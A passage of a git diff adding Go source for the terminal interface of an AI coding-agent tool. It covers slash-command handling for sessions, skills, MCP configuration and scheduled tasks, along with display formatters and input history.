+	case "/cron":
+		a.handleCronCommand(parts)
+	case "/help":
+		a.addMessage(statusStyle.Render("Commands:"))
+		a.addMessage(statusStyle.Render("  /mode [plan|agent|yolo] - Switch or show mode"))
+		a.addMessage(statusStyle.Render("  /model [model_id]       - Switch or show model"))
+		a.addMessage(statusStyle.Render("  /skills                 - List available skills"))
+		a.addMessage(statusStyle.Render("  /skill <name>           - Activate a skill"))
+		a.addMessage(statusStyle.Render("  /clear                  - Clear conversation"))
+		a.addMessage(statusStyle.Render("  /compact                - Trigger context compaction"))
+		a.addMessage(statusStyle.Render("  /sessions               - List sessions for this project"))
+		a.addMessage(statusStyle.Render("  /sessions ls            - List sessions"))
+		a.addMessage(statusStyle.Render("  /sessions set <id>      - Switch to session"))
+		a.addMessage(statusStyle.Render("  /sessions clear         - Create a new session"))
+		a.addMessage(statusStyle.Render("  /sessions del <id>      - Delete a session"))
+		a.addMessage(statusStyle.Render("  /init_mcp [target] [template] [--force]"))
+		a.addMessage(statusStyle.Render("                         - Init mcp.json (target: project|global, template: basic|full)"))
+		a.addMessage(statusStyle.Render("  /mcps                   - List MCP servers (global/project mcp.json)"))
+		a.addMessage(statusStyle.Render("  /agent list              - List all agents (multi-agent mode)"))
+		a.addMessage(statusStyle.Render("  /agent switch <id>       - Switch active agent"))
+		a.addMessage(statusStyle.Render("  /agent destroy <id>      - Destroy a sub-agent"))
+		a.addMessage(statusStyle.Render("  /cron add <description>  - Add scheduled task (multi-agent mode)"))
+		a.addMessage(statusStyle.Render("  /cron list               - List scheduled tasks"))
+		a.addMessage(statusStyle.Render("  /cron enable <id>        - Enable a task"))
+		a.addMessage(statusStyle.Render("  /cron disable <id>       - Disable a task"))
+		a.addMessage(statusStyle.Render("  /cron remove <id>        - Remove a task"))
+		a.addMessage(statusStyle.Render("  /cron run <id>           - Run a task now"))
+		a.addMessage(statusStyle.Render("  /quit                   - Exit"))
+		a.addMessage(statusStyle.Render("  /help                   - Show this help"))
+		a.addMessage(statusStyle.Render(""))
+		a.addMessage(statusStyle.Render("Keyboard shortcuts:"))
+		a.addMessage(statusStyle.Render("  Tab       - Cycle mode (plan/agent/yolo)"))
+		a.addMessage(statusStyle.Render("  Esc       - Abort current operation"))
+		a.addMessage(statusStyle.Render("  Ctrl+O    - Open latest tool details"))
+		a.addMessage(statusStyle.Render("  PgUp/PgDn - Page tool details when open"))
+		a.addMessage(statusStyle.Render("  Mouse wheel - Scroll terminal history"))
+	default:
+		// Handle /skill:<name> syntax (colon-separated)
+		if strings.HasPrefix(command, "/skill:") {
+			skillName := strings.TrimPrefix(command, "/skill:")
+			if skillName != "" {
+				a.activateSkill(skillName)
+			} else {
+				a.listSkills()
+			}
+		} else {
+			a.addMessage(errorStyle.Render(fmt.Sprintf("Unknown: %s", command)))
+		}
+	}
+
+	return nil
+}
+
+// listSkills displays all available skills.
+func (a *App) listSkills() {
+	if a.skillsMgr == nil {
+		a.addMessage(statusStyle.Render("No skills manager available."))
+		return
+	}
+	skillList := a.skillsMgr.List()
+	if len(skillList) == 0 {
+		a.addMessage(statusStyle.Render("No skills found."))
+		return
+	}
+
+	var sb strings.Builder
+	sb.WriteString("Available skills:\n")
+	for _, s := range skillList {
+		marker := " "
+		if _, ok := a.activeSkills[s.Name]; ok {
+			marker = "*"
+		}
+		sb.WriteString(fmt.Sprintf("  [%s] %s (%s): %s\n", marker, s.Name, s.Source, s.Description))
+	}
+	sb.WriteString("\nUse /skill <name> or /skill:<name> to activate a skill.")
+	a.addMessage(statusStyle.Render(sb.String()))
+}
+
+// activateSkill loads a skill's content into the extra context.
+func (a *App) activateSkill(name string) {
+	if a.skillsMgr == nil {
+		a.addMessage(errorStyle.Render("No skills manager available."))
+		return
+	}
+	skill := a.skillsMgr.Get(name)
+	if skill == nil {
+		a.addMessage(errorStyle.Render(fmt.Sprintf("Skill not found: %s", name)))
+		return
+	}
+
+	// Check if already active
+	if _, ok := a.activeSkills[name]; ok {
+		a.addMessage(statusStyle.Render(fmt.Sprintf("Skill '%s' is already active.", name)))
+		return
+	}
+
+	// Add skill content to active skills
+	skillCtx := a.skillsMgr.BuildSkillContext(name)
+	a.activeSkills[name] = skillCtx
+
+	// Rebuild extraContext from base + all active skills
+	a.rebuildExtraContext()
+
+	// Reset agent so next message uses the updated context
+	a.agent = nil
+	a.agentHistoryLoaded = false
+
+	a.addMessage(statusStyle.Render(fmt.Sprintf("✅ Skill '%s' activated (%s): %s", name, skill.Source, skill.Description)))
+}
+
+// rebuildExtraContext rebuilds extraContext from base context + all active skills.
+func (a *App) rebuildExtraContext() {
+	sb := strings.Builder{}
+	sb.WriteString(a.baseExtraContext)
+	for _, ctx := range a.activeSkills {
+		sb.WriteString(ctx)
+	}
+	a.extraContext = sb.String()
+}
+
+// getSessionDir returns the session directory path.
+func (a *App) getSessionDir() string {
+	if a.settings != nil {
+		return a.settings.GetSessionDir()
+	}
+	home, _ := os.UserHomeDir()
+	if home == "" {
+		home = "."
+	}
+	return filepath.Join(home, ".vibecoding", "sessions")
+}
+
+// getCurrentSessionID returns the current session's short ID (first 8 chars).
+func (a *App) getCurrentSessionID() string {
+	if a.session == nil {
+		return ""
+	}
+	file := a.session.GetFile()
+	if file == "" {
+		return ""
+	}
+	base := filepath.Base(file)
+	base = strings.TrimSuffix(base, ".jsonl")
+	if idx := strings.Index(base, "_"); idx >= 0 {
+		return base[idx+1:]
+	}
+	return ""
+}
+
+// handleSessionsCommand handles the /sessions command and its subcommands.
+func (a *App) handleSessionsCommand(parts []string) {
+	sub := "ls"
+	if len(parts) > 1 {
+		sub = strings.ToLower(parts[1])
+	}
+
+	switch sub {
+	case "ls", "list":
+		a.sessionsList()
+	case "set", "switch", "use":
+		if len(parts) < 3 {
+			a.addMessage(errorStyle.Render("Usage: /sessions set <id>"))
+			return
+		}
+		a.sessionsSet(parts[2])
+	case "clear", "new":
+		a.sessionsClear()
+	case "del", "delete", "rm":
+		if len(parts) < 3 {
+			a.addMessage(errorStyle.Render("Usage: /sessions del <id>"))
+			return
+		}
+		a.sessionsDel(parts[2])
+	default:
+		a.addMessage(errorStyle.Render(fmt.Sprintf("Unknown subcommand: %s. Use ls, set, clear, del.", sub)))
+	}
+}
+
+// sessionsList lists all sessions for the current project directory.
+func (a *App) sessionsList() {
+	cwd := ""
+	if a.session != nil && a.session.GetHeader() != nil {
+		cwd = a.session.GetHeader().Cwd
+	}
+	if cwd == "" {
+		if w, err := os.Getwd(); err == nil {
+			cwd = w
+		}
+	}
+
+	sessionDir := a.getSessionDir()
+	details, err := session.ListForDirDetailed(cwd, sessionDir)
+	if err != nil {
+		a.addMessage(errorStyle.Render(fmt.Sprintf("Error listing sessions: %v", err)))
+		return
+	}
+
+	if len(details) == 0 {
+		a.addMessage(statusStyle.Render("No sessions found for this project."))
+		return
+	}
+
+	currentID := a.getCurrentSessionID()
+
+	var sb strings.Builder
+	sb.WriteString("Sessions for this project:\n\n")
+	for _, d := range details {
+		marker := " "
+		if d.ID == currentID {
+			marker = "*"
+		}
+		age := formatAge(d.ModTime)
+		preview := ""
+		if d.Preview != "" {
+			preview = " - " + d.Preview
+		}
+		sb.WriteString(fmt.Sprintf("  [%s] %s  %d msgs  %s%s\n",
+			marker, d.ID, d.MessageCount, age, preview))
+	}
+	sb.WriteString("\nUse /sessions set <id> to switch. * = current session.")
+	a.addMessage(statusStyle.Render(sb.String()))
+}
+
+// sessionsSet switches to a different session by ID prefix.
+func (a *App) sessionsSet(id string) {
+	cwd := ""
+	if a.session != nil && a.session.GetHeader() != nil {
+		cwd = a.session.GetHeader().Cwd
+	}
+	if cwd == "" {
+		if w, err := os.Getwd(); err == nil {
+			cwd = w
+		}
+	}
+
+	// Don't switch to the same session
+	if id == a.getCurrentSessionID() {
+		a.addMessage(statusStyle.Render("Already on this session."))
+		return
+	}
+
+	sessionDir := a.getSessionDir()
+	details, err := session.ListForDirDetailed(cwd, sessionDir)
+	if err != nil {
+		a.addMessage(errorStyle.Render(fmt.Sprintf("Error: %v", err)))
+		return
+	}
+
+	// Find matching session by ID prefix
+	var match *session.SessionDetail
+	for i, d := range details {
+		if strings.HasPrefix(d.ID, id) {
+			if match != nil {
+				a.addMessage(errorStyle.Render(fmt.Sprintf("Ambiguous ID '%s'. Be more specific.", id)))
+				return
+			}
+			match = &details[i]
+		}
+	}
+
+	if match == nil {
+		a.addMessage(errorStyle.Render(fmt.Sprintf("No session found matching '%s'.", id)))
+		return
+	}
+
+	// Open the session
+	newSess, err := session.Open(match.Path)
+	if err != nil {
+		a.addMessage(errorStyle.Render(fmt.Sprintf("Error opening session: %v", err)))
+		return
+	}
+
+	// Switch session
+	a.session = newSess
+	a.historyLoaded = false
+	a.agentHistoryLoaded = false
+
+	// Reset agent and UI state
+	a.agent = nil
+	a.messages = nil
+	a.toolResults = nil
+	a.contextUsage = nil
+	a.totalInputTokens = 0
+	a.totalCacheRead = 0
+	a.totalCacheWrite = 0
+	a.assistantRaw = make(map[int]string)
+	a.assistantRendered = make(map[int]string)
+	a.assistantDirty = make(map[int]bool)
+	a.printedMessageIdx = make(map[int]bool)
+	a.currentAssistantIdx = -1
+	a.currentThinkIdx = -1
+
+	// Load history messages from the new session
+	a.LoadHistoryMessages()
+	a.updateViewportContent()
+
+	a.addMessage(statusStyle.Render(fmt.Sprintf("✅ Switched to session %s (%d msgs)",
+		match.ID, match.MessageCount)))
+}
+
+func (a *App) handleInitMCPCommand(parts []string) {
+	target := "project"
+	template := "full"
+	force := false
+
+	for _, p := range parts[1:] {
+		switch strings.ToLower(p) {
+		case "project", "global":
+			target = strings.ToLower(p)
+		case "basic", "full":
+			template = strings.ToLower(p)
+		case "--force":
+			force = true
+		default:
+			a.addMessage(errorStyle.Render("Usage: /init_mcp [project|global] [basic|full] [--force]"))
+			return
+		}
+	}
+
+	path := config.ProjectMCPPath()
+	if target == "global" {
+		path = config.GlobalMCPPath()
+	}
+
+	if !force {
+		if _, err := os.Stat(path); err == nil {
+			a.addMessage(statusStyle.Render(fmt.Sprintf("MCP config already exists: %s (use --force to overwrite)", path)))
+			return
+		}
+	}
+
+	var cfg *config.MCPConfig
+	if template == "basic" {
+		cfg = config.DefaultMCPConfig()
+	} else {
+		cfg = config.FullMCPConfigTemplate()
+	}
+
+	if err := config.SaveMCPConfig(path, cfg); err != nil {
+		a.addMessage(errorStyle.Render(fmt.Sprintf("Init MCP config failed: %v", err)))
+		return
+	}
+	a.addMessage(statusStyle.Render(fmt.Sprintf("✅ Created MCP config: %s", path)))
+	a.addMessage(statusStyle.Render(fmt.Sprintf("Template: %s | Target: %s", template, target)))
+}
+
+func (a *App) handleMCPsCommand() {
+	type sourceInfo struct {
+		label string
+		path  string
+	}
+	sources := []sourceInfo{
+		{label: "Global", path: config.GlobalMCPPath()},
+		{label: "Project", path: config.ProjectMCPPath()},
+	}
+
+	var sb strings.Builder
+	sb.WriteString("MCP servers:\n")
+	foundAny := false
+
+	for _, src := range sources {
+		sb.WriteString(fmt.Sprintf("\n%s (%s):\n", src.label, src.path))
+		cfg, err := config.LoadMCPConfig(src.path)
+		if err != nil {
+			if os.IsNotExist(err) {
+				sb.WriteString("  (not configured)\n")
+				continue
+			}
+			sb.WriteString(fmt.Sprintf("  (invalid: %v)\n", err))
+			continue
+		}
+		config.NormalizeMCPConfig(cfg)
+		if len(cfg.MCPServers) == 0 {
+			sb.WriteString("  (empty)\n")
+			continue
+		}
+		for _, srv := range cfg.MCPServers {
+			foundAny = true
+			target := srv.Command
+			if target == "" {
+				target = srv.URL
+			}
+			if target == "" {
+				target = "-"
+			}
+			sb.WriteString(fmt.Sprintf("  - %s [%s] %s\n", srv.Name, srv.Type, target))
+		}
+	}
+
+	if !foundAny {
+		sb.WriteString("\nUse /init_mcp to create project mcp.json.")
+	}
+	a.addMessage(statusStyle.Render(sb.String()))
+}
+
+// sessionsClear creates a new session, starting fresh.
+func (a *App) sessionsClear() {
+	cwd := ""
+	if a.session != nil && a.session.GetHeader() != nil {
+		cwd = a.session.GetHeader().Cwd
+	}
+	if cwd == "" {
+		if w, err := os.Getwd(); err == nil {
+			cwd = w
+		}
+	}
+
+	sessionDir := a.getSessionDir()
+	newSess := session.New(cwd, sessionDir)
+	if err := newSess.Init(); err != nil {
+		a.addMessage(errorStyle.Render(fmt.Sprintf("Error creating session: %v", err)))
+		return
+	}
+
+	a.session = newSess
+	a.historyLoaded = false
+	a.agentHistoryLoaded = false
+
+	// Reset agent and UI state
+	a.agent = nil
+	a.messages = nil
+	a.toolResults = nil
+	a.contextUsage = nil
+	a.totalInputTokens = 0
+	a.totalCacheRead = 0
+	a.totalCacheWrite = 0
+	a.assistantRaw = make(map[int]string)
+	a.assistantRendered = make(map[int]string)
+	a.assistantDirty = make(map[int]bool)
+	a.printedMessageIdx = make(map[int]bool)
+	a.currentAssistantIdx = -1
+	a.currentThinkIdx = -1
+	a.updateViewportContent()
+
+	a.addMessage(statusStyle.Render("✅ New session created."))
+}
+
+// sessionsDel deletes a session by ID prefix.
+func (a *App) sessionsDel(id string) {
+	cwd := ""
+	if a.session != nil && a.session.GetHeader() != nil {
+		cwd = a.session.GetHeader().Cwd
+	}
+	if cwd == "" {
+		if w, err := os.Getwd(); err == nil {
+			cwd = w
+		}
+	}
+
+	// Don't delete the current session
+	if id == a.getCurrentSessionID() {
+		a.addMessage(errorStyle.Render("Cannot delete the current session. Switch to another session first, or use /sessions clear to start fresh."))
+		return
+	}
+
+	sessionDir := a.getSessionDir()
+	details, err := session.ListForDirDetailed(cwd, sessionDir)
+	if err != nil {
+		a.addMessage(errorStyle.Render(fmt.Sprintf("Error: %v", err)))
+		return
+	}
+
+	// Find matching session by ID prefix
+	var match *session.SessionDetail
+	for i, d := range details {
+		if strings.HasPrefix(d.ID, id) {
+			if match != nil {
+				a.addMessage(errorStyle.Render(fmt.Sprintf("Ambiguous ID '%s'. Be more specific.", id)))
+				return
+			}
+			match = &details[i]
+		}
+	}
+
+	if match == nil {
+		a.addMessage(errorStyle.Render(fmt.Sprintf("No session found matching '%s'.", id)))
+		return
+	}
+
+	if err := session.DeleteSession(match.Path, a.settings.GetSessionDir()); err != nil {
+		a.addMessage(errorStyle.Render(fmt.Sprintf("Error deleting session: %v", err)))
+		return
+	}
+
+	a.addMessage(statusStyle.Render(fmt.Sprintf("✅ Deleted session %s.", match.ID)))
+}
+
+// formatAge returns a human-readable age string for a time.
+func formatAge(t time.Time) string {
+	d := time.Since(t)
+	switch {
+	case d < time.Minute:
+		return "just now"
+	case d < time.Hour:
+		mins := int(d.Minutes())
+		if mins == 1 {
+			return "1 min ago"
+		}
+		return fmt.Sprintf("%d mins ago", mins)
+	case d < 24*time.Hour:
+		hours := int(d.Hours())
+		if hours == 1 {
+			return "1 hour ago"
+		}
+		return fmt.Sprintf("%d hours ago", hours)
+	case d < 30*24*time.Hour:
+		days := int(d.Hours() / 24)
+		if days == 1 {
+			return "1 day ago"
+		}
+		return fmt.Sprintf("%d days ago", days)
+	default:
+		return t.Format("2006-01-02")
+	}
+}
diff --git a/internal/tui/events.go b/internal/tui/events.go
new file mode 100644
index 0000000..113f81c
--- /dev/null
+++ b/internal/tui/events.go
@@ -0,0 +1,27 @@
+package tui
+
+import (
+	"context"
+
+	tea "github.com/charmbracelet/bubbletea"
+
+	"github.com/startvibecoding/vibecoding/internal/agent"
+)
+
+type agentEventMsg struct{ event agent.Event }
+type agentDoneMsg struct{ err error }
+
+func (a *App) listenAgentEvents() tea.Cmd {
+	eventCh := a.eventCh
+	return func() tea.Msg {
+		var next agent.Event
+		err := agent.ConsumeEvents(context.Background(), eventCh, agent.EventHandlerFunc(func(_ context.Context, event agent.Event) error {
+			next = event
+			return context.Canceled
+		}))
+		if next.Type != 0 || err == context.Canceled {
+			return agentEventMsg{event: next}
+		}
+		return agentDoneMsg{err: err}
+	}
+}
diff --git a/internal/tui/formatters.go b/internal/tui/formatters.go
new file mode 100644
index 0000000..6e66890
--- /dev/null
+++ b/internal/tui/formatters.go
@@ -0,0 +1,297 @@
+package tui
+
+import (
+	"fmt"
+	"regexp"
+	"strconv"
+	"strings"
+	"time"
+
+	"github.com/startvibecoding/vibecoding/internal/tools"
+	"github.com/startvibecoding/vibecoding/internal/util"
+)
+
+func planStatusMarker(status string) string {
+	switch status {
+	case "running":
+		return ">"
+	case "done":
+		return "x"
+	case "failed":
+		return "!"
+	default:
+		return "-"
+	}
+}
+
+func formatPlanForDisplay(plan *tools.TaskPlan) string {
+	if plan == nil || len(plan.Steps) == 0 {
+		return "Plan updated."
+	}
+	var sb strings.Builder
+	title := plan.Title
+	if title == "" {
+		title = "Plan"
+	}
+	sb.WriteString(title)
+	for _, step := range plan.Steps {
+		sb.WriteString("\n")
+		sb.WriteString(fmt.Sprintf("%s %s", planStatusMarker(step.Status), step.Title))
+	}
+	if plan.Note != "" {
+		sb.WriteString("\nnote: " + plan.Note)
+	}
+	return sb.String()
+}
+
+// formatToolArgs formats tool arguments for display
+func formatToolArgs(toolName string, args map[string]any) string {
+	var parts []string
+
+	switch toolName {
+	case "write":
+		if path, ok := args["path"]; ok {
+			parts = append(parts, fmt.Sprintf("path: %v", path))
+		}
+		if content, ok := args["content"]; ok {
+			contentStr := fmt.Sprintf("%v", content)
+			parts = append(parts, fmt.Sprintf("content:\n%s", contentStr))
+		}
+	case "edit":
+		if path, ok := args["path"]; ok {
+			parts = append(parts, fmt.Sprintf("path: %v", path))
+		}
+		if editList, ok := args["edits"]; ok {
+			if arr, ok := editList.([]any); ok {
+				for idx, e := range arr {
+					if m, ok := e.(map[string]any); ok {
+						oldT, _ := m["oldText"].(string)
+						newT, _ := m["newText"].(string)
+						parts = append(parts, fmt.Sprintf("edit[%d]:\n  old: %s\n  new: %s", idx+1, oldT, newT))
+					}
+				}
+			}
+		}
+	case "read":
+		if path, ok := args["path"]; ok {
+			parts = append(parts, fmt.Sprintf("path: %v", path))
+		}
+	case "bash":
+		if cmd, ok := args["command"]; ok {
+			parts = append(parts, fmt.Sprintf("command: %v", cmd))
+		}
+	default:
+		for k, v := range args {
+			vStr := fmt.Sprintf("%v", v)
+			if len(vStr) > 100 {
+				vStr = vStr[:100] + "..."
+			}
+			parts = append(parts, fmt.Sprintf("%s: %s", k, vStr))
+		}
+	}
+
+	return strings.Join(parts, "\n")
+}
+
+func formatToolHeader(result toolResult) string {
+	path := toolPath(result.toolArgs)
+	if path == "" {
+		return fmt.Sprintf("🔧 [%s]", result.toolName)
+	}
+	return fmt.Sprintf("🔧 [%s] %s", result.toolName, path)
+}
+
+func formatEditedToolResult(result toolResult) string {
+	path := toolPath(result.toolArgs)
+	if result.diff != nil && result.diff.Path != "" {
+		path = result.diff.Path
+	}
+	if path == "" {
+		path = "(unknown)"
+	}
+
+	summary := result.summary
+	if result.diff != nil {
+		summary = fmt.Sprintf("(+%d -%d)", result.diff.Added, result.diff.Deleted)
+	}
+
+	header := fmt.Sprintf("• Edited %s", path)
+	if summary != "" {
+		header += " " + summary
+	}
+
+	if result.diff == nil || strings.TrimSpace(result.diff.Unified) == "" {
+		return header
+	}
+
+	diffLines := formatUnifiedDiffExcerpt(result.diff.Unified)
+	if diffLines == "" {
+		return header
+	}
+	return header + "\n" + diffLines
+}
+
+var unifiedHunkRe = regexp.MustCompile(`^@@ -([0-9]+)(?:,[0-9]+)? \+([0-9]+)(?:,[0-9]+)? @@`)
+
+func formatUnifiedDiffExcerpt(unified string) string {
+	var lines []string
+	oldLine, newLine := 0, 0
+	for _, line := range strings.Split(strings.TrimRight(unified, "\n"), "\n") {
+		if strings.HasPrefix(line, "--- ") || strings.HasPrefix(line, "+++ ") || line == "" {
+			continue
+		}
+		if matches := unifiedHunkRe.FindStringSubmatch(line); matches != nil {
+			oldLine, _ = strconv.Atoi(matches[1])
+			newLine, _ = strconv.Atoi(matches[2])
+			continue
+		}
+		if oldLine == 0 && newLine == 0 {
+			continue
+		}
+
+		kind := line[0]
+		text := ""
+		if len(line) > 1 {
+			text = line[1:]
+		}
+
+		switch kind {
+		case ' ':
+			lines = append(lines, formatDiffExcerptLine(newLine, ' ', text))
+			oldLine++
+			newLine++
+		case '-':
+			lines = append(lines, formatDiffExcerptLine(oldLine, '-', text))
+			oldLine++
+		case '+':
+			lines = append(lines, formatDiffExcerptLine(newLine, '+', text))
+			newLine++
+		}
+	}
+	return strings.Join(lines, "\n")
+}
+
+func formatDiffExcerptLine(lineNo int, kind byte, text string) string {
+	return fmt.Sprintf("    %-4d %c%s", lineNo, kind, text)
+}
+
+func toolPath(args map[string]any) string {
+	if args == nil {
+		return ""
+	}
+	path, _ := args["path"].(string)
+	return path
+}
+
+func summarizeWriteToolResult(result string) string {
+	lines := strings.Split(result, "\n")
+	diff := ""
+	deleted := ""
+	added := ""
+	for _, line := range lines {
+		if strings.HasPrefix(line, "Diff: ") {
+			diff = strings.TrimPrefix(line, "Diff: ")
+			continue
+		}
+		if strings.HasPrefix(line, "- lines: ") {
+			deleted = strings.TrimPrefix(line, "- lines: ")
+			continue
+		}
+		if strings.HasPrefix(line, "+ lines: ") {
+			added = strings.TrimPrefix(line, "+ lines: ")
+		}
+	}
+	if diff != "" && (deleted != "" || added != "") {
+		return fmt.Sprintf("%s (-%s +%s)", diff, deleted, added)
+	}
+	if diff != "" {
+		return diff
+	}
+	return "Written"
+}
+
+func summarizeFileDiff(diff *tools.FileDiff) string {
+	if diff == nil {
+		return ""
+	}
+	suffix := ""
+	if diff.Truncated {
+		suffix = " large"
+	}
+	return fmt.Sprintf("+%d -%d%s (-%s +%s)",
+		diff.Added,
+		diff.Deleted,
+		suffix,
+		formatLineRangesForDisplay(diff.DeletedLines),
+		formatLineRangesForDisplay(diff.AddedLines),
+	)
+}
+
+func formatLineRangesForDisplay(lines []int) string {
+	if len(lines) == 0 {
+		return "none"
+	}
+	var ranges []string
+	start, prev := lines[0], lines[0]
+	for _, line := range lines[1:] {
+		if line == prev+1 {
+			prev = line
+			continue
+		}
+		ranges = append(ranges, formatLineRangeForDisplay(start, prev))
+		start, prev = line, line
+	}
+	ranges = append(ranges, formatLineRangeForDisplay(start, prev))
+	return strings.Join(ranges, ",")
+}
+
+func formatLineRangeForDisplay(start, end int) string {
+	if start == end {
+		return fmt.Sprintf("%d", start)
+	}
+	return fmt.Sprintf("%d-%d", start, end)
+}
+
+func minInt(a, b int) int {
+	if a < b {
+		return a
+	}
+	return b
+}
+
+// compactBashOutput compresses bash tool output for summary display by removing blank lines.
+func compactBashOutput(s string) string {
+	var sb strings.Builder
+	prevBlank := false
+	for _, line := range strings.Split(s, "\n") {
+		trimmed := strings.TrimSpace(line)
+		if trimmed == "" {
+			if !prevBlank {
+				sb.WriteString("\n")
+			}
+			prevBlank = true
+			continue
+		}
+		prevBlank = false
+		sb.WriteString(line)
+		sb.WriteString("\n")
+	}
+	return strings.TrimSpace(sb.String())
+}
+
+func truncate(s string, maxLen int) string {
+	return util.TruncateWithSuffix(s, maxLen, "...")
+}
+
+func formatDuration(d time.Duration) string {
+	if d < time.Second {
+		return "<1s"
+	}
+	if d < time.Minute {
+		return fmt.Sprintf("%ds", int(d.Seconds()))
+	}
+	if d < time.Hour {
+		return fmt.Sprintf("%dm%02ds", int(d.Minutes()), int(d.Seconds())%60)
+	}
+	return fmt.Sprintf("%dh%02dm", int(d.Hours()), int(d.Minutes())%60)
+}
diff --git a/internal/tui/input.go b/internal/tui/input.go
new file mode 100644
index 0000000..1383046
--- /dev/null
+++ b/internal/tui/input.go
@@ -0,0 +1,263 @@
+package tui
+
+import (
+	"context"
+	"fmt"
+	"strings"
+	"time"
+
+	tea "github.com/charmbracelet/bubbletea"
+
+	agentpkg "github.com/startvibecoding/vibecoding/agent"
+	"github.com/startvibecoding/vibecoding/internal/agent"
+	ctxpkg "github.com/startvibecoding/vibecoding/internal/context"
+	"github.com/startvibecoding/vibecoding/internal/provider"
+)
+
+func (a *App) addMessage(msg string) {
+	a.messages = append(a.messages, msg)
+	a.printHistory(msg)
+}
+
+func (a *App) printHistory(msg string) {
+	if strings.TrimSpace(msg) == "" {
+		return
+	}
+	if a.program != nil {
+		go a.program.Println(msg)
+		return
+	}
+	a.pendingPrints = append(a.pendingPrints, msg)
+}
+
+func (a *App) printMessageOnce(idx int) {
+	if idx < 0 || a.printedMessageIdx[idx] {
+		return
+	}
+	a.printedMessageIdx[idx] = true
+	rendered := a.renderMessageAt(idx)
+	a.printHistory(rendered)
+}
+
+func (a *App) commitActiveStream() {
+	hadActive := a.currentThinkIdx >= 0 || a.currentAssistantIdx >= 0
+	if a.currentThinkIdx >= 0 {
+		a.printMessageOnce(a.currentThinkIdx)
+	}
+	if a.currentAssistantIdx >= 0 {
+		a.printMessageOnce(a.currentAssistantIdx)
+	}
+	if hadActive {
+		a.currentThinkIdx = -1
+		a.currentAssistantIdx = -1
+		a.updateViewportContent()
+	}
+}
+
+func (a *App) flushPendingPrints() tea.Cmd {
+	if len(a.pendingPrints) == 0 {
+		return nil
+	}
+	prints := append([]string(nil), a.pendingPrints...)
+	a.pendingPrints = nil
+
+	cmds := make([]tea.Cmd, 0, len(prints))
+	for _, msg := range prints {
+		cmds = append(cmds, tea.Println(msg))
+	}
+	return tea.Batch(cmds...)
+}
+
+func (a *App) finishRequestTimer() {
+	if !a.requestStart.IsZero() {
+		a.lastDuration = time.Since(a.requestStart)
+		a.requestStart = time.Time{}
+		return
+	}
+	if elapsed := a.timer.Elapsed(); elapsed > 0 {
+		a.lastDuration = elapsed
+	}
+}
+
+func (a *App) cycleMode() {
+	switch a.mode {
+	case "plan":
+		a.mode = "agent"
+	case "agent":
+		a.mode = "yolo"
+	case "yolo":
+		a.mode = "plan"
+	default:
+		a.mode = "agent"
+	}
+
+	if a.agent != nil {
+		// Rebuild agent with new mode
+		compactionSettings := ctxpkg.CompactionSettings{
+			Enabled:          a.settings.Compaction.Enabled,
+			ReserveTokens:    a.settings.Compaction.ReserveTokens,
+			KeepRecentTokens: a.settings.Compaction.KeepRecentTokens,
+		}
+		if compactionSettings.ReserveTokens == 0 {
+			compactionSettings.ReserveTokens = 16384
+		}
+		if compactionSettings.KeepRecentTokens == 0 {
+			compactionSettings.KeepRecentTokens = 20000
+		}
+
+		oldMessages := a.agent.GetMessages()
+		agentCfg := agent.Config{
+			Provider:           a.provider,
+			Model:              a.model,
+			Mode:               a.mode,
+			ThinkingLevel:      provider.ThinkingLevel(a.settings.DefaultThinkingLevel),
+			MaxTokens:          a.settings.MaxOutputTokens,
+			Settings:           a.settings,
+			Session:            a.session,
+			ExtraContext:       a.extraContext,
+			CompactionSettings: compactionSettings,
+			MultiAgent:         a.multiAgent,
+		}
+		a.agent = agent.New(agentCfg, a.registry)
+		a.agent.LoadHistoryMessages(oldMessages)
+	}
+
+	var modeLabel string
+	switch a.mode {
+	case "plan":
+		modeLabel = "🗒 PLAN - Read-only mode"
+	case "agent":
+		modeLabel = "🔧 AGENT - File edits, bash with approval"
+	case "yolo":
+		modeLabel = "🚀 YOLO - Full access"
+	}
+	a.addMessage(statusStyle.Render(fmt.Sprintf("Mode: %s", modeLabel)))
+}
+
+func (a *App) recordInputHistory(input string) {
+	input = strings.TrimSpace(input)
+	if input == "" {
+		return
+	}
+	if len(a.inputHistory) > 0 && a.inputHistory[len(a.inputHistory)-1] == input {
+		a.resetInputHistoryNavigation()
+		return
+	}
+	a.inputHistory = append(a.inputHistory, input)
+	const maxInputHistory = 200
+	if len(a.inputHistory) > maxInputHistory {
+		a.inputHistory = a.inputHistory[len(a.inputHistory)-maxInputHistory:]
+	}
+	a.resetInputHistoryNavigation()
+}
+
+func (a *App) navigateInputHistory(direction int) bool {
+	if a.waitingForApproval || len(a.inputHistory) == 0 {
+		return false
+	}
+
+	switch {
+	case direction < 0:
+		if !a.inputHistoryBrowsing {
+			a.inputHistoryDraft = a.input.Value()
+			a.inputHistoryIndex = len(a.inputHistory) - 1
+			a.inputHistoryBrowsing = true
+		} else if a.inputHistoryIndex > 0 {
+			a.inputHistoryIndex--
+		}
+	case direction > 0:
+		if !a.inputHistoryBrowsing {
+			return false
+		}
+		if a.inputHistoryIndex < len(a.inputHistory)-1 {
+			a.inputHistoryIndex++
+		} else {
+			a.inputHistoryBrowsing = false
+			a.inputHistoryIndex = 0
+			a.input.SetValue(a.inputHistoryDraft)
+			a.input.CursorEnd()
+			a.inputHistoryDraft = ""
+			a.scheduleRender()
+			return true
+		}
+	default:
+		return false
+	}
+
+	if a.inputHistoryIndex >= 0 && a.inputHistoryIndex < len(a.inputHistory) {
+		a.input.SetValue(a.inputHistory[a.inputHistoryIndex])
+		a.input.CursorEnd()
+		a.scheduleRender()
+		return true
+	}
+	return false
+}
+
+func (a *App) resetInputHistoryNavigation() {
+	a.inputHistoryBrowsing = false
+	a.inputHistoryIndex = 0
+	a.inputHistoryDraft = ""
+}
+
+func (a *App) processInput(input string) tea.Cmd {
+	if strings.HasPrefix(input, "/") {
+		return a.handleCommand(input)
+	}
+
+	if a.agent == nil {
+		compactionSettings := ctxpkg.CompactionSettings{
+			Enabled:          a.settings.Compaction.Enabled,
+			ReserveTokens:    a.settings.Compaction.ReserveTokens,
+			KeepRecentTokens: a.settings.Compaction.KeepRecentTokens,
+		}
+		if compactionSettings.ReserveTokens == 0 {
+			compactionSettings.ReserveTokens = 16384
+		}
+		if compactionSettings.KeepRecentTokens == 0 {
+			compactionSettings.KeepRecentTokens = 20000
+		}
+
+		agentCfg := agent.Config{
+			Provider:           a.provider,
+			Model:              a.model,
+			Mode:               a.mode,
+			ThinkingLevel:      provider.ThinkingLevel(a.settings.DefaultThinkingLevel),
+			MaxTokens:          a.settings.MaxOutputTokens,
+			Settings:           a.settings,
+			Session:            a.session,
+			ExtraContext:       a.extraContext,
